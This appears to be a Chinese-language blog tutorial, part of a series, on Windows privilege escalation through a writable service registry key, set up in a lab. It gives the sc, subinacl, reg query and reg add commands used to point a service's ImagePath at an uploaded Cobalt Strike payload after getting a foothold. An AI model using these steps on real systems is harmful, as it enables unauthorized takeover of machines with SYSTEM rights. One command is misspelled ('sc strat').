操作系统权限提升(七)之系统错误配置-不安全注册表提权

系列文章

操作系统权限提升(一)之操作系统权限介绍
操作系统权限提升(二)之常见提权的环境介绍
操作系统权限提升(三)之Windows系统内核溢出漏洞提权
操作系统权限提升(四)之系统错误配置-Tusted Service Paths提权
操作系统权限提升(五)之系统错误配置-PATH环境变量提权
操作系统权限提升(六)之系统错误配置-不安全的服务提权

注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!!

不安全注册表提权

不安全注册表提权的原理

Windows的服务路径存储在Windows的注册表中,若注册表配置不当,当攻击者可以发现使用低权限可以更改注册表的选项的时候,就可以导致提权,可以将 imagepath 修改成恶意的文件,重启导致提权

在这里插入图片描述

提权环境准备

1、新建立一个服务,test

sc create test binpath= "C:\1.exe"

在这里插入图片描述
2、打开注册表给该文件权限

在这里插入图片描述
在这里插入图片描述

或者用工具

shell subinacl /keyreg "HKEY_LOCAL_MACHINE\system\ControlSet001\Services\test" /grant=apache=f

不安全注册表提权实战

1、先使用MSF或者CS上线靶机

在这里插入图片描述2、查询计算机中的所有服务

sc query type= all state= all |findstr /i service_name.* |more

在这里插入图片描述在这里插入图片描述3、使用subinacl进行查询提权

shell subinacl /keyreg "HKEY_LOCAL_MACHINE\system\ControlSet001\Services\test" /display

在这里插入图片描述
在这里插入图片描述
4、查询该服务的 imagepath 值

reg query HKEY_LOCAL_MACHINE\system\ControlSet001\Services\test /v imagepath

在这里插入图片描述
5、查看上传的cs的恶意程序文件路劲并记录下来

在这里插入图片描述
6、替换该文件为恶意的文件或者修改文件的路径

reg add "HKEY_LOCAL_MACHINE\system\ControlSet001\Services\test" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\apache\Desktop\1.exe" /f

在这里插入图片描述7、查询是否替换

reg query HKEY_LOCAL_MACHINE\system\ControlSet001\services\test /v imagepath

在这里插入图片描述这里可以看到我们的服务路劲已经被篡改了

8、这个时候apache是没有权限启动服务的,需要管理员重启电脑

这里我们模拟管理员启动这个服务

sc strat test

在这里插入图片描述
9、提权成功
在这里插入图片描述

posted @ 2023-02-01 16:29  私ははいしゃ敗者です  阅读(38)  评论(0编辑  收藏  举报  来源